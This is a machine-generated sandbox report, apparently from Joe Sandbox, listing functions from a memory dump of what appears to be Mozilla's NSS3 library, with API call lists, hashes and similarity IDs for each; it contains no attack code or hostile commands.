Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
String ID:
API String ID: 3535121653-0
Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction ID: 196527c8afb16a4e6c87f1405c3a154f2017fd2133ac5f42e186a37a5daadb4a
Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction Fuzzy Hash: 832165B46402069BF7009F55DC50F66BBB9FF5939CF24812CD81987B81EB75D918CB90

Function 6CEF2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CEF2E08

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CEF2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CEF2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CEF2E95

Part of subcall function 6CEE1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CE888A4,00000000,00000000), ref: 6CEE1228
Part of subcall function 6CEE1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CEE1238
Part of subcall function 6CEE1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CE888A4,00000000,00000000), ref: 6CEE124B
Part of subcall function 6CEE1200: PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0,00000000,00000000,00000000,?,6CE888A4,00000000,00000000), ref: 6CEE125D
Part of subcall function 6CEE1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CEE126F
Part of subcall function 6CEE1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CEE1280
Part of subcall function 6CEE1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CEE128E
Part of subcall function 6CEE1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CEE129A
Part of subcall function 6CEE1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CEE12A1

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: c5ca5d219114e72b91a5a70d4de3ec5a91f5af024b98c183d877513d2b462085
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: D72108B1E003854BEB01CF549D44BAA3774AFA534CF310269DD285B742F7B2E699C392

Function 6CEAACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CEAACC2

Part of subcall function 6CE82F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE82F0A
Part of subcall function 6CE82F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE82F1D

Part of subcall function 6CE82AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CE80A1B,00000000), ref: 6CE82AF0
Part of subcall function 6CE82AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE82B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CEAAD5E

Part of subcall function 6CEC57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CE8B41E,00000000,00000000,?,00000000,?,6CE8B41E,00000000,00000000,00000001,?), ref: 6CEC57E0
Part of subcall function 6CEC57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CEC5843

CERT_DestroyCertList.NSS3(?), ref: 6CEAAD36

Part of subcall function 6CE82F50: CERT_DestroyCertificate.NSS3(?), ref: 6CE82F65
Part of subcall function 6CE82F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE82F83

free.MOZGLUE(?), ref: 6CEAAD4F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 307d81048b8986ea13270ee65ca85872e8bb42887a4bbb870d3e5ea03a1b4318
Instruction ID: 4a2e5f27c61be154aaaec444f872bce8f284c2ef7913e56eb9fba71a130a14ff
Opcode Fuzzy Hash: 307d81048b8986ea13270ee65ca85872e8bb42887a4bbb870d3e5ea03a1b4318
Instruction Fuzzy Hash: 9521C3B1D013148FEB10DFA4D9065EEBBF4AF1520CF254068D849BB701FB31AA5ACBA1

Function 6CED3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CED3C9E
EnterCriticalSection.KERNEL32(?), ref: 6CED3CAE
PR_Unlock.NSS3(?), ref: 6CED3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6CED3D02

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 8df10a4b7f792bf1e6f435a940b24814e4894f52cda4dfd77d61153560c3d5b8
Instruction ID: 3e36d62ea38cc882fed920bb63c702341356a034060edff9abb89a0de0a1af06
Opcode Fuzzy Hash: 8df10a4b7f792bf1e6f435a940b24814e4894f52cda4dfd77d61153560c3d5b8
Instruction Fuzzy Hash: 8F11B179A00204AFDB40AF24E848A9A3778EF09368F664564ED089B712E731ED45CBE1

Function 6CEDECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CEDF0AD,6CEDF150,?,6CEDF150,?,?,?), ref: 6CEDECBA

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CEDECD1

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CEDED02

Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CEDED5A

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 524a2134e0c6d7cc0c0f2cbe3c9467be06f0e9ac83adc9b7063f1f2b74230722
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: FB21A4B1900B425BE700CF25D948B56B7F4BFA934CF26C219E81C87762EB70E595C6D1

Function 6CF0EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CEF7FFA,?,6CEF9767,?,8B7874C0,0000A48E), ref: 6CF0EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CEF7FFA,?,6CEF9767,?,8B7874C0,0000A48E), ref: 6CF0EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CEF7FFA,?,6CEF9767,?,8B7874C0,0000A48E), ref: 6CF0EE14

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

memcpy.VCRUNTIME140(?,?,6CEF9767,00000000,00000000,6CEF7FFA,?,6CEF9767,?,8B7874C0,0000A48E), ref: 6CF0EE33

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 21f6931aa30def73c90c14eca85ee3c31a794d0095e726a2dc40f7418d3a3894
Instruction ID: 063083d84c94e43678c2c08bbcf42258f24259887d8d8c15a7adf785b7fc1e3a
Opcode Fuzzy Hash: 21f6931aa30def73c90c14eca85ee3c31a794d0095e726a2dc40f7418d3a3894
Instruction Fuzzy Hash: AE1125B1B0570AABEB109EA5DC94B82B3A8FF0475CF214535E959C7A40E730F464C7E2

Function 6CE8DFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CEA06A0: TlsGetValue.KERNEL32 ref: 6CEA06C2
Part of subcall function 6CEA06A0: EnterCriticalSection.KERNEL32(?), ref: 6CEA06D6
Part of subcall function 6CEA06A0: PR_Unlock.NSS3 ref: 6CEA06EB

CERT_NewCertList.NSS3 ref: 6CE8DFBF
CERT_AddCertToListTail.NSS3(00000000,?), ref: 6CE8DFDB
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CE8DFFA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE8E029

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
String ID:
API String ID: 3183882470-0
Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction ID: 91796c62ab4541cd38505ad988734b97ae47be0bc2ceae2901447c554908c08d
Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction Fuzzy Hash: 00116F79A02A066FDB110EA85C00BAB75B8AF8135CF340938E81CCBB10E736C81592E1

Function 6CEA8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CEA8DE7
EnterCriticalSection.KERNEL32 ref: 6CEA8DFC
PR_Unlock.NSS3 ref: 6CEA8E2D
PR_SetError.NSS3 ref: 6CEA8E49

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 7a2daac3211f72d6b28cd12c1eeac6da618dc9fcdcb82b944f0e38042f3361e4
Instruction ID: e0c0c047e8e3bddda5a9970633dffecf1f1f06c3f44690c1897f5a0346033c12
Opcode Fuzzy Hash: 7a2daac3211f72d6b28cd12c1eeac6da618dc9fcdcb82b944f0e38042f3361e4
Instruction Fuzzy Hash: D3114F71A05A009FD740AFB8D444659BBF4FF05314F51496ADD89DB700EB34E895CBD2

Function 6CF2AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CF15F17,?,?,?,?,?,?,?,?,6CF1AAD4), ref: 6CF2AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CF15F17,?,?,?,?,?,?,?,?,6CF1AAD4), ref: 6CF2ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CF1AAD4), ref: 6CF2ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CF1AAD4), ref: 6CF2ACDB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 01148fd44109b6cccd0247531a1d24f6beaa8b834d11f0618a7104500ce4131f
Instruction ID: 51ae2347d7c84256e98c570c4a48668936c5b8f3a89cb309c8bf72c9b31a9a5d
Opcode Fuzzy Hash: 01148fd44109b6cccd0247531a1d24f6beaa8b834d11f0618a7104500ce4131f
Instruction Fuzzy Hash: 74019EB5B01B119BE750DF79D908743B7E8BF00659B104839D85AC3E00EB34F014CB91

Function 6CE91DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6CE91DFB

Part of subcall function 6CE895B0: TlsGetValue.KERNEL32(00000000,?,6CEA00D2,00000000), ref: 6CE895D2
Part of subcall function 6CE895B0: EnterCriticalSection.KERNEL32(?,?,?,6CEA00D2,00000000), ref: 6CE895E7
Part of subcall function 6CE895B0: PR_Unlock.NSS3(?,?,?,?,6CEA00D2,00000000), ref: 6CE89605

PR_EnterMonitor.NSS3 ref: 6CE91E09

Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490AB
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490C9
Part of subcall function 6CF49090: EnterCriticalSection.KERNEL32 ref: 6CF490E5
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49116
Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF4913F

Part of subcall function 6CE8E190: PR_EnterMonitor.NSS3(?,?,6CE8E175), ref: 6CE8E19C
Part of subcall function 6CE8E190: PR_EnterMonitor.NSS3(6CE8E175), ref: 6CE8E1AA
Part of subcall function 6CE8E190: PR_ExitMonitor.NSS3 ref: 6CE8E208
Part of subcall function 6CE8E190: PL_HashTableRemove.NSS3(?), ref: 6CE8E219
Part of subcall function 6CE8E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE8E231
Part of subcall function 6CE8E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE8E249
Part of subcall function 6CE8E190: PR_ExitMonitor.NSS3 ref: 6CE8E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE91E37
PR_ExitMonitor.NSS3 ref: 6CE91E4A

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: d0290818c04890969dc662102bdcc7dc3826bce065556ecf2d27cd787eedf8ff
Instruction ID: dff220aa7248e9313ff6ad0718ce619929a435ed584c12c8f3364c10d7aa3df9
Opcode Fuzzy Hash: d0290818c04890969dc662102bdcc7dc3826bce065556ecf2d27cd787eedf8ff
Instruction Fuzzy Hash: CC01F271B01250A7EB405BA9EC00F5677BCAB46B4CF304034E8199BB91EB71E815DBD2

Function 6CE91D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE91D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CE91D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6CE91D9C
free.MOZGLUE(00000000), ref: 6CE91DB8

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: a6159d8a2c0d5547811af47a0d213d24c3620c02ed2138e8597714c483ec642f
Instruction ID: e892504250ab745fdcee8e7c846e410a67c4a86c74bd784099ad64a428bb1819
Opcode Fuzzy Hash: a6159d8a2c0d5547811af47a0d213d24c3620c02ed2138e8597714c483ec642f
Instruction Fuzzy Hash: FBF0F9B2A4121057FB105EDA5C42B87367C9BC57DDF300275DD1D8BB50DA70E80582E1

Function 6CF2AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CF15D40,00000000,?,?,6CF06AC6,6CF1639C), ref: 6CF2AC2D

Part of subcall function 6CECADC0: TlsGetValue.KERNEL32(?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAE10
Part of subcall function 6CECADC0: EnterCriticalSection.KERNEL32(?,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAE24
Part of subcall function 6CECADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CEAD079,00000000,00000001), ref: 6CECAE5A
Part of subcall function 6CECADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAE6F
Part of subcall function 6CECADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAE7F
Part of subcall function 6CECADC0: TlsGetValue.KERNEL32(?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAEB1
Part of subcall function 6CECADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CEACDBB,?,6CEAD079,00000000,00000001), ref: 6CECAEC9

PK11_FreeSymKey.NSS3(?,6CF15D40,00000000,?,?,6CF06AC6,6CF1639C), ref: 6CF2AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CF15D40,00000000,?,?,6CF06AC6,6CF1639C), ref: 6CF2AC59
free.MOZGLUE(8CB6FF01,6CF06AC6,6CF1639C,?,?,?,?,?,?,?,?,?,6CF15D40,00000000,?,6CF1AAD4), ref: 6CF2AC62

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 5964db7f6e02afcae4d079644935059f08fff3f9002da1db1eb3e592ca573d8d
Instruction ID: 3aa4f9303857f13d66c705ad3680f054486d670fed776581f0499d7defc0c744
Opcode Fuzzy Hash: 5964db7f6e02afcae4d079644935059f08fff3f9002da1db1eb3e592ca573d8d
Instruction Fuzzy Hash: 19014BB56406109FDB00DF65E9C0B467BF8AF44B5CF1880A8E9498F706D739E848CBA2

Function 6CEDFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CE89003,?), ref: 6CEDFD91

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

PORT_Alloc_Util.NSS3(A4686CEE,?), ref: 6CEDFDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686CEE,?,?), ref: 6CEDFDC4
free.MOZGLUE(00000000,?,?), ref: 6CEDFDD1

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
